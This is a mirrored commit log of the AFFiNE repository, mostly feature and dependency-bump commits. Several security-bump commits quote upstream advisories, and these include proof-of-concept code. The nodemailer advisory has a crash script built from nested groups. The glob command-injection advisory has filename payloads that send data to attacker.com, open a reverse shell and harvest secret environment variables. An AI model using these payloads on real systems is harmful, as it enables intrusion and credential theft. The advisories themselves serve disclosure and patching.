mirror of
https://github.com/toeverything/AFFiNE.git
synced 2026-07-15 00:56:26 +08:00
a38e7e58e005fc07b913e8e4fb03a8f0bd6ef396
1720 Commits
| Author | SHA1 | Message | Date | |
|---|---|---|---|---|
|
|
4f1d57ade5 |
feat: integrate typst preview & fix mermaid style (#14168)
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit
* **New Features**
* Typst code block preview with interactive rendering controls (zoom,
pan, reset) and user-friendly error messages
* **Style**
* Centered Mermaid diagram rendering for improved layout
* **Tests**
* Added end-to-end preview validation tests for Typst and Mermaid
* **Chores**
* Added WebAssembly type declarations and updated frontend packages;
removed a build debug configuration entry
<sub>✏️ Tip: You can customize this high-level summary in your review
settings.</sub>
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
|
||
|
|
6514614df8 | feat: bump electron (#14158) | ||
|
|
4eed92cebf | feat: improve electron sandbox (#14156) | ||
|
|
ca386283c5 | feat: bump electron (#14151) | ||
|
|
efbdee5508 |
chore: bump up storybook version to v10.1.10 [SECURITY] (#14131)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [storybook](https://storybook.js.org) ([source](https://redirect.github.com/storybookjs/storybook/tree/HEAD/code/core)) | [`10.1.5` -> `10.1.10`](https://renovatebot.com/diffs/npm/storybook/10.1.5/10.1.10) |  |  | ### GitHub Vulnerability Alerts #### [CVE-2025-68429](https://redirect.github.com/storybookjs/storybook/security/advisories/GHSA-8452-54wp-rmv6) On December 11th, the Storybook team received a responsible disclosure alerting them to a potential vulnerability in certain built and published Storybooks. The vulnerability is a bug in how Storybook handles environment variables defined in a `.env` file, which could, in specific circumstances, lead to those variables being unexpectedly bundled into the artifacts created by the `storybook build` command. When a built Storybook is published to the web, the bundle’s source is viewable, thus potentially exposing those variables to anyone with access. If those variables contained secrets, they should be considered compromised. ## Who is impacted? For a project to be vulnerable to this issue, it must: - Build the Storybook (i.e. run `storybook build` directly or indirectly) in a directory that contains a `.env` file (including variants like `.env.local`) - The `.env` file contains sensitive secrets - Use Storybook version `7.0.0` or above - Publish the built Storybook to the web Storybooks built without a `.env` file at build time are not affected, including common CI-based builds where secrets are provided via platform environment variables rather than `.env` files. Users' Storybook runtime environments (i.e. `storybook dev`) are not affected. Deployed applications that share a repo with a project's Storybook are not affected. Storybook 6 and below are not affected. ## Recommended actions First, Storybook recommends that everyone audit for any sensitive secrets provided via `.env` files and rotate those keys. Second, Storybook has released patched versions of all affected major Storybook versions that no longer have this vulnerability. Projects should upgrade their Storybook—on both local machines and CI environments—to one of these versions **before publishing again**. - `10.1.10+` - `9.1.17+` - `8.6.15+` - `7.6.21+` Finally, some projects may have been relying on the undocumented behavior at the heart of this issue and will need to change how they reference environment variables after this update. If a project can no longer read necessary environmental variable values, it can either prefix the variables with `STORYBOOK_` or use the [`env` property in Storybook’s configuration](https://storybook.js.org/docs/configure/environment-variables#using-storybook-configuration) to manually specify values. In either case, **do not** include sensitive secrets as they *will* be included in the built bundle. ## Further information Details of the vulnerability can be found on the [Storybook announcement](https://storybook.js.org/blog/security-advisory). --- ### Release Notes <details> <summary>storybookjs/storybook (storybook)</summary> ### [`v10.1.10`](https://redirect.github.com/storybookjs/storybook/blob/HEAD/CHANGELOG.md#10110) [Compare Source](https://redirect.github.com/storybookjs/storybook/compare/v10.1.9...v10.1.10) - Core: Fix `.env`-file parsing - [#​33383](https://redirect.github.com/storybookjs/storybook/pull/33383), thanks [@​JReinhold](https://redirect.github.com/JReinhold)! - Next.js: Handle v14 compatibility for draftMode import - [#​33341](https://redirect.github.com/storybookjs/storybook/pull/33341), thanks [@​tanujbhaud](https://redirect.github.com/tanujbhaud)! ### [`v10.1.9`](https://redirect.github.com/storybookjs/storybook/blob/HEAD/CHANGELOG.md#1019) [Compare Source](https://redirect.github.com/storybookjs/storybook/compare/v10.1.8...v10.1.9) - Telemetry: Remove instance of check for sub-error handling - [#​33356](https://redirect.github.com/storybookjs/storybook/pull/33356), thanks [@​valentinpalkovic](https://redirect.github.com/valentinpalkovic)! ### [`v10.1.8`](https://redirect.github.com/storybookjs/storybook/compare/v10.1.7...7cd0cbca4ee2f2c082c9876de2fb2feba6c12bbf) [Compare Source](https://redirect.github.com/storybookjs/storybook/compare/v10.1.7...v10.1.8) ### [`v10.1.7`](https://redirect.github.com/storybookjs/storybook/blob/HEAD/CHANGELOG.md#1017) [Compare Source](https://redirect.github.com/storybookjs/storybook/compare/v10.1.6...v10.1.7) - Automigrate: Fix missing await - [#​33333](https://redirect.github.com/storybookjs/storybook/pull/33333), thanks [@​valentinpalkovic](https://redirect.github.com/valentinpalkovic)! - CLI: Remove REACT\_PROJECT projectType - [#​33334](https://redirect.github.com/storybookjs/storybook/pull/33334), thanks [@​valentinpalkovic](https://redirect.github.com/valentinpalkovic)! - Core: Exclude open from pre-bundling to make local xdg-open reachable - [#​33325](https://redirect.github.com/storybookjs/storybook/pull/33325), thanks [@​Sidnioulz](https://redirect.github.com/Sidnioulz)! - Nextjs-Vite: Install `vite` during migration if not installed yet - [#​33316](https://redirect.github.com/storybookjs/storybook/pull/33316), thanks [@​ghengeveld](https://redirect.github.com/ghengeveld)! - Telemetry: Fix race condition in telemetry cache causing malformed JSON - [#​33323](https://redirect.github.com/storybookjs/storybook/pull/33323), thanks [@​valentinpalkovic](https://redirect.github.com/valentinpalkovic)! ### [`v10.1.6`](https://redirect.github.com/storybookjs/storybook/blob/HEAD/CHANGELOG.md#1016) [Compare Source](https://redirect.github.com/storybookjs/storybook/compare/v10.1.5...v10.1.6) - Manager: Do not display non-existing shortcuts in the settings page - [#​32711](https://redirect.github.com/storybookjs/storybook/pull/32711), thanks [@​DKER2](https://redirect.github.com/DKER2)! - Preview: Enforce inert body if manager is focus-trapped - [#​33186](https://redirect.github.com/storybookjs/storybook/pull/33186), thanks [@​Sidnioulz](https://redirect.github.com/Sidnioulz)! - Telemetry: Await pending operations in getLastEvents to prevent race conditions - [#​33285](https://redirect.github.com/storybookjs/storybook/pull/33285), thanks [@​valentinpalkovic](https://redirect.github.com/valentinpalkovic)! - UI: Fix keyboard navigation bug for "reset" option in `Select` - [#​33268](https://redirect.github.com/storybookjs/storybook/pull/33268), thanks [@​Sidnioulz](https://redirect.github.com/Sidnioulz)! </details> --- ### Configuration 📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi41OS4wIiwidXBkYXRlZEluVmVyIjoiNDIuNTkuMCIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
844b9d9592 | feat(server): impl native reader for server (#14100) | ||
|
|
a0eeed0cdb |
feat: implement export as PDF (#14057)
I used [pdfmake](https://www.npmjs.com/package/pdfmake) to implement an "export as PDF" feature, and I am happy to share with you! This should fix #13577, fix #8846, and fix #13959. A showcase: [Getting Started.pdf](https://github.com/user-attachments/files/24013057/Getting.Started.pdf) Although it might miss rendering some properties currently, it can evolve in the long run and provide a more native experience for the users. <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** - Experimental "Export to PDF" option added to the export menu (behind a feature flag) - PDF export supports headings, paragraphs, lists, code blocks, tables, images, callouts, linked documents and embedded content * **Chores** - Added PDF rendering library and consolidated PDF utilities - Feature flag introduced to control rollout * **Tests** - Comprehensive unit tests added for PDF content rendering logic <sub>✏️ Tip: You can customize this high-level summary in your review settings.</sub> <!-- end of auto-generated comment: release notes by coderabbit.ai --> --------- Co-authored-by: Copilot <175728472+Copilot@users.noreply.github.com> Co-authored-by: DarkSky <darksky2048@gmail.com> |
||
|
|
246e09e0cd |
fix: roll back electron version to v35 (#14089)
In electron v36, all workers do not work. The webpack configuration is too complicated, so go back first. If start a new project with [forge](https://www.electronforge.io/) and latest electron, the worker works well. <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Chores** * Downgraded the Electron development/runtime used for building and testing the desktop app from v36 to v35; this is a development-environment change with no functional or API changes affecting end users. <sub>✏️ Tip: You can customize this high-level summary in your review settings.</sub> <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
cb0ff04efa | feat: bump more deps (#14079) | ||
|
|
40f3337d45 |
feat: bump deps (#14076)
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit
* **Chores**
* Updated core dependencies, developer tooling and Rust toolchain to
newer stable versions across the repo
* Upgraded Storybook to v10 and improved ESM path resolution for
storybook tooling
* Broadened native binding platform/architecture support and
strengthened native module version validation, loading and WASI handling
* **New Features**
* Exposed an additional native text export for consumers (enhanced
JS/native surface)
<sub>✏️ Tip: You can customize this high-level summary in your review
settings.</sub>
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
|
||
|
|
027f741ed6 |
chore: bump deps (#14065)
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit
* **Chores**
* Updated dependency versions across the monorepo (notably zod →
^3.25.76 and vitest-related packages → ^3.2.4), plus minor package bumps
to align tooling and libraries. These are manifest/test-tooling updates
only; no public API, behavior, or end-user features were changed.
<sub>✏️ Tip: You can customize this high-level summary in your review
settings.</sub>
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
|
||
|
|
903e0c4d71 |
chore: bump up nodemailer version to v7.0.11 [SECURITY] (#14062)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [nodemailer](https://nodemailer.com/) ([source](https://redirect.github.com/nodemailer/nodemailer)) | [`7.0.9` -> `7.0.11`](https://renovatebot.com/diffs/npm/nodemailer/7.0.9/7.0.11) |  |  | ### GitHub Vulnerability Alerts #### [GHSA-rcmh-qjqh-p98v](https://redirect.github.com/nodemailer/nodemailer/security/advisories/GHSA-rcmh-qjqh-p98v) ### Summary A DoS can occur that immediately halts the system due to the use of an unsafe function. ### Details According to **RFC 5322**, nested group structures (a group inside another group) are not allowed. Therefore, in lib/addressparser/index.js, the email address parser performs flattening when nested groups appear, since such input is likely to be abnormal. (If the address is valid, it is added as-is.) In other words, the parser flattens all nested groups and inserts them into the final group list. However, the code implemented for this flattening process can be exploited by malicious input and triggers DoS RFC 5322 uses a colon (:) to define a group, and commas (,) are used to separate members within a group. At the following location in lib/addressparser/index.js: https://github.com/nodemailer/nodemailer/blob/master/lib/addressparser/index.js#L90 there is code that performs this flattening. The issue occurs when the email address parser attempts to process the following kind of malicious address header: ```g0: g1: g2: g3: ... gN: victim@example.com;``` Because no recursion depth limit is enforced, the parser repeatedly invokes itself in the pattern `addressparser → _handleAddress → addressparser → ...` for each nested group. As a result, when an attacker sends a header containing many colons, Nodemailer enters infinite recursion, eventually throwing Maximum call stack size exceeded and causing the process to terminate immediately. Due to the structure of this behavior, no authentication is required, and a single request is enough to shut down the service. The problematic code section is as follows: ```js if (isGroup) { ... if (data.group.length) { let parsedGroup = addressparser(data.group.join(',')); // <- boom! parsedGroup.forEach(member => { if (member.group) { groupMembers = groupMembers.concat(member.group); } else { groupMembers.push(member); } }); } } ``` `data.group` is expected to contain members separated by commas, but in the attacker’s payload the group contains colon `(:)` tokens. Because of this, the parser repeatedly triggers recursive calls for each colon, proportional to their number. ### PoC ``` const nodemailer = require('nodemailer'); function buildDeepGroup(depth) { let parts = []; for (let i = 0; i < depth; i++) { parts.push(`g${i}:`); } return parts.join(' ') + ' user@example.com;'; } const DEPTH = 3000; // <- control depth const toHeader = buildDeepGroup(DEPTH); console.log('to header length:', toHeader.length); const transporter = nodemailer.createTransport({ streamTransport: true, buffer: true, newline: 'unix' }); console.log('parsing start'); transporter.sendMail( { from: 'test@example.com', to: toHeader, subject: 'test', text: 'test' }, (err, info) => { if (err) { console.error('error:', err); } else { console.log('finished :', info && info.envelope); } } ); ``` As a result, when the colon is repeated beyond a certain threshold, the Node.js process terminates immediately. ### Impact The attacker can achieve the following: 1. Force an immediate crash of any server/service that uses Nodemailer 2. Kill the backend process with a single web request 3. In environments using PM2/Forever, trigger a continuous restart loop, causing severe resource exhaustion” --- ### Release Notes <details> <summary>nodemailer/nodemailer (nodemailer)</summary> ### [`v7.0.11`](https://redirect.github.com/nodemailer/nodemailer/blob/HEAD/CHANGELOG.md#7011-2025-11-26) [Compare Source](https://redirect.github.com/nodemailer/nodemailer/compare/v7.0.10...v7.0.11) ##### Bug Fixes - prevent stack overflow DoS in addressparser with deeply nested groups ([b61b9c0](https://redirect.github.com/nodemailer/nodemailer/commit/b61b9c0cfd682b6f647754ca338373b68336a150)) ### [`v7.0.10`](https://redirect.github.com/nodemailer/nodemailer/blob/HEAD/CHANGELOG.md#7010-2025-10-23) [Compare Source](https://redirect.github.com/nodemailer/nodemailer/compare/v7.0.9...v7.0.10) ##### Bug Fixes - Increase data URI size limit from 100KB to 50MB and preserve content type ([28dbf3f](https://redirect.github.com/nodemailer/nodemailer/commit/28dbf3fe129653f5756c150a98dc40593bfb2cfe)) </details> --- ### Configuration 📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi4zMi4yIiwidXBkYXRlZEluVmVyIjoiNDIuMzIuMiIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
f29e47e9d2 |
feat: improve oauth (#14061)
fix #13730 fix #12901 fix #14025 |
||
|
|
b7ebe3d0d6 |
chore: bump up glob version to v11.1.0 [SECURITY] (#13976)
This PR contains the following updates: | Package | Change | Age | Confidence | |---|---|---|---| | [glob](https://redirect.github.com/isaacs/node-glob) | [`11.0.2` -> `11.1.0`](https://renovatebot.com/diffs/npm/glob/11.0.2/11.1.0) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | ### GitHub Vulnerability Alerts #### [CVE-2025-64756](https://redirect.github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2) ### Summary The glob CLI contains a command injection vulnerability in its `-c/--cmd` option that allows arbitrary command execution when processing files with malicious names. When `glob -c <command> <patterns>` is used, matched filenames are passed to a shell with `shell: true`, enabling shell metacharacters in filenames to trigger command injection and achieve arbitrary code execution under the user or CI account privileges. ### Details **Root Cause:** The vulnerability exists in `src/bin.mts:277` where the CLI collects glob matches and executes the supplied command using `foregroundChild()` with `shell: true`: ```javascript stream.on('end', () => foregroundChild(cmd, matches, { shell: true })) ``` **Technical Flow:** 1. User runs `glob -c <command> <pattern>` 2. CLI finds files matching the pattern 3. Matched filenames are collected into an array 4. Command is executed with matched filenames as arguments using `shell: true` 5. Shell interprets metacharacters in filenames as command syntax 6. Malicious filenames execute arbitrary commands **Affected Component:** - **CLI Only:** The vulnerability affects only the command-line interface - **Library Safe:** The core glob library API (`glob()`, `globSync()`, streams/iterators) is not affected - **Shell Dependency:** Exploitation requires shell metacharacter support (primarily POSIX systems) **Attack Surface:** - Files with names containing shell metacharacters: `$()`, backticks, `;`, `&`, `|`, etc. - Any directory where attackers can control filenames (PR branches, archives, user uploads) - CI/CD pipelines using `glob -c` on untrusted content ### PoC **Setup Malicious File:** ```bash mkdir test_directory && cd test_directory # Create file with command injection payload in filename touch '$(touch injected_poc)' ``` **Trigger Vulnerability:** ```bash # Run glob CLI with -c option node /path/to/glob/dist/esm/bin.mjs -c echo "**/*" ``` **Result:** - The echo command executes normally - **Additionally:** The `$(touch injected_poc)` in the filename is evaluated by the shell - A new file `injected_poc` is created, proving command execution - Any command can be injected this way with full user privileges **Advanced Payload Examples:** **Data Exfiltration:** ```bash # Filename: $(curl -X POST https://attacker.com/exfil -d "$(whoami):$(pwd)" > /dev/null 2>&1) touch '$(curl -X POST https://attacker.com/exfil -d "$(whoami):$(pwd)" > /dev/null 2>&1)' ``` **Reverse Shell:** ```bash # Filename: $(bash -i >& /dev/tcp/attacker.com/4444 0>&1) touch '$(bash -i >& /dev/tcp/attacker.com/4444 0>&1)' ``` **Environment Variable Harvesting:** ```bash # Filename: $(env | grep -E "(TOKEN|KEY|SECRET)" > /tmp/secrets.txt) touch '$(env | grep -E "(TOKEN|KEY|SECRET)" > /tmp/secrets.txt)' ``` ### Impact **Arbitrary Command Execution:** - Commands execute with full privileges of the user running glob CLI - No privilege escalation required - runs as current user - Access to environment variables, file system, and network **Real-World Attack Scenarios:** **1. CI/CD Pipeline Compromise:** - Malicious PR adds files with crafted names to repository - CI pipeline uses `glob -c` to process files (linting, testing, deployment) - Commands execute in CI environment with build secrets and deployment credentials - Potential for supply chain compromise through artifact tampering **2. Developer Workstation Attack:** - Developer clones repository or extracts archive containing malicious filenames - Local build scripts use `glob -c` for file processing - Developer machine compromise with access to SSH keys, tokens, local services **3. Automated Processing Systems:** - Services using glob CLI to process uploaded files or external content - File uploads with malicious names trigger command execution - Server-side compromise with potential for lateral movement **4. Supply Chain Poisoning:** - Malicious packages or themes include files with crafted names - Build processes using glob CLI automatically process these files - Wide distribution of compromise through package ecosystems **Platform-Specific Risks:** - **POSIX/Linux/macOS:** High risk due to flexible filename characters and shell parsing - **Windows:** Lower risk due to filename restrictions, but vulnerability persists with PowerShell, Git Bash, WSL - **Mixed Environments:** CI systems often use Linux containers regardless of developer platform ### Affected Products - **Ecosystem:** npm - **Package name:** glob - **Component:** CLI only (`src/bin.mts`) - **Affected versions:** v10.3.7 through v11.0.3 (and likely later versions until patched) - **Introduced:** v10.3.7 (first release with CLI containing `-c/--cmd` option) - **Patched versions:** 11.1.0 **Scope Limitation:** - **Library API Not Affected:** Core glob functions (`glob()`, `globSync()`, async iterators) are safe - **CLI-Specific:** Only the command-line interface with `-c/--cmd` option is vulnerable ### Remediation - Upgrade to `glob@11.1.0` or higher, as soon as possible. - If any `glob` CLI actions fail, then convert commands containing positional arguments, to use the `--cmd-arg`/`-g` option instead. - As a last resort, use `--shell` to maintain `shell:true` behavior until glob v12, but ensure that no untrusted contents can possibly be encountered in the file path results. --- ### Release Notes <details> <summary>isaacs/node-glob (glob)</summary> ### [`v11.1.0`](https://redirect.github.com/isaacs/node-glob/compare/v11.0.3...v11.1.0) [Compare Source](https://redirect.github.com/isaacs/node-glob/compare/v11.0.3...v11.1.0) ### [`v11.0.3`](https://redirect.github.com/isaacs/node-glob/compare/v11.0.2...v11.0.3) [Compare Source](https://redirect.github.com/isaacs/node-glob/compare/v11.0.2...v11.0.3) </details> --- ### Configuration 📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0MS4xNzMuMSIsInVwZGF0ZWRJblZlciI6IjQxLjE3My4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
46e7d9fab7 |
chore: bump electron (#13935)
fix #13647 <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit ## Release Notes * **Chores** * Updated development tooling and build dependencies to latest stable versions * Increased minimum Node.js requirement to version 22 * Updated macOS deployment target to version 11.6 * Enhanced type safety and error handling in build processes <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
17ec76540b |
feat(editor): import docs from docx (#11774)
Support importing .docx files, as mentioned in https://github.com/toeverything/AFFiNE/issues/10154#issuecomment-2655744757 It essentially uses mammoth to convert the docx to html, and then imports the html with the standard steps. <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * Import Microsoft Word (.docx) files directly via the import dialog (creates new documents). * .docx added as a selectable file type in the file picker and import options. * **Localization** * Added localized labels and tooltips for DOCX import in English, Simplified Chinese, and Traditional Chinese. <!-- end of auto-generated comment: release notes by coderabbit.ai --> --------- Co-authored-by: DarkSky <25152247+darkskygit@users.noreply.github.com> Co-authored-by: DarkSky <darksky2048@gmail.com> |
||
|
|
b7ac7caab4 |
chore(server): improve transcript stability (#13821)
<!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * Enhanced audio/video detection for MP4 files to better distinguish audio-only vs. video. * **Dependencies** * Added MP4 parsing dependency and updated AI provider libraries (Anthropic, Google, OpenAI, etc.). * **Bug Fixes** * Tightened authentication state validation for magic-link/OTP flows. * Stricter space-join validation to reject invalid client types/versions. * Improved transcript entry deduplication and data handling. * **API** * Transcript submit payload now requires infos and removes deprecated url/mimeType fields. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
1a9863d36f |
chore: bump up opentelemetry (#12651)
This PR contains the following updates: | Package | Change | Age | Confidence | |---|---|---|---| | [@opentelemetry/exporter-prometheus](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-exporter-prometheus) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`^0.57.0` -> `^0.207.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fexporter-prometheus/0.57.2/0.207.0) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [@opentelemetry/host-metrics](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/host-metrics#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/host-metrics)) | [`^0.35.4` -> `^0.36.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fhost-metrics/0.35.5/0.36.2) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [@opentelemetry/instrumentation](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-instrumentation) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`^0.57.0` -> `^0.207.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation/0.57.2/0.207.0) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [@opentelemetry/instrumentation-graphql](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-graphql#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-graphql)) | [`^0.47.0` -> `^0.55.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-graphql/0.47.1/0.55.0) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [@opentelemetry/instrumentation-http](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-instrumentation-http) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`^0.57.0` -> `^0.207.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-http/0.57.2/0.207.0) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [@opentelemetry/instrumentation-ioredis](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-ioredis#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-ioredis)) | [`^0.47.0` -> `^0.55.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-ioredis/0.47.1/0.55.0) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [@opentelemetry/instrumentation-nestjs-core](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-nestjs-core#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-nestjs-core)) | [`^0.44.0` -> `^0.54.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-nestjs-core/0.44.1/0.54.0) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [@opentelemetry/instrumentation-socket.io](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-socket.io#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-socket.io)) | [`^0.46.0` -> `^0.54.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-socket.io/0.46.1/0.54.0) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [@opentelemetry/sdk-node](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-sdk-node) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`^0.57.0` -> `^0.207.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsdk-node/0.57.2/0.207.0) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | --- ### Release Notes <details> <summary>open-telemetry/opentelemetry-js (@​opentelemetry/exporter-prometheus)</summary> ### [`v0.207.0`](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/8e9b8bb2a7a2d81ae0b5171efdf1644210697fa2...fb6476d8243ac8dcaaea74130b9c50c43938275c) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/8e9b8bb2a7a2d81ae0b5171efdf1644210697fa2...fb6476d8243ac8dcaaea74130b9c50c43938275c) ### [`v0.206.0`](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/2d3760898cdc4f0e68f9f956603cc5df279eb3a8...8e9b8bb2a7a2d81ae0b5171efdf1644210697fa2) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/2d3760898cdc4f0e68f9f956603cc5df279eb3a8...8e9b8bb2a7a2d81ae0b5171efdf1644210697fa2) ### [`v0.205.0`](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/98f9d720af84bc38074dfd4ab7760ae83a3e9826...2d3760898cdc4f0e68f9f956603cc5df279eb3a8) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/98f9d720af84bc38074dfd4ab7760ae83a3e9826...2d3760898cdc4f0e68f9f956603cc5df279eb3a8) ### [`v0.204.0`](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/93187f022457da152becc03dd00db8b2500702db...98f9d720af84bc38074dfd4ab7760ae83a3e9826) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/93187f022457da152becc03dd00db8b2500702db...98f9d720af84bc38074dfd4ab7760ae83a3e9826) ### [`v0.203.0`](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/55f8c20b19777602f993328fe07f523cf465dea3...93187f022457da152becc03dd00db8b2500702db) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/55f8c20b19777602f993328fe07f523cf465dea3...93187f022457da152becc03dd00db8b2500702db) ### [`v0.202.0`](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/9dbd1e446be0ecc7c22b00051c5cfb2612d9b0f2...55f8c20b19777602f993328fe07f523cf465dea3) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/9dbd1e446be0ecc7c22b00051c5cfb2612d9b0f2...55f8c20b19777602f993328fe07f523cf465dea3) ### [`v0.201.1`](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/4ce5bd165195870f292fa95e312cffe05eb9e09d...9dbd1e446be0ecc7c22b00051c5cfb2612d9b0f2) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/4ce5bd165195870f292fa95e312cffe05eb9e09d...9dbd1e446be0ecc7c22b00051c5cfb2612d9b0f2) ### [`v0.201.0`](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/7fde94081ed141c7d61db269b77d5765887a9665...4ce5bd165195870f292fa95e312cffe05eb9e09d) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/7fde94081ed141c7d61db269b77d5765887a9665...4ce5bd165195870f292fa95e312cffe05eb9e09d) ### [`v0.200.0`](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/ac8641a5dbb5df1169bd5ed25a6667a6a6f730ca...7fde94081ed141c7d61db269b77d5765887a9665) [Compare 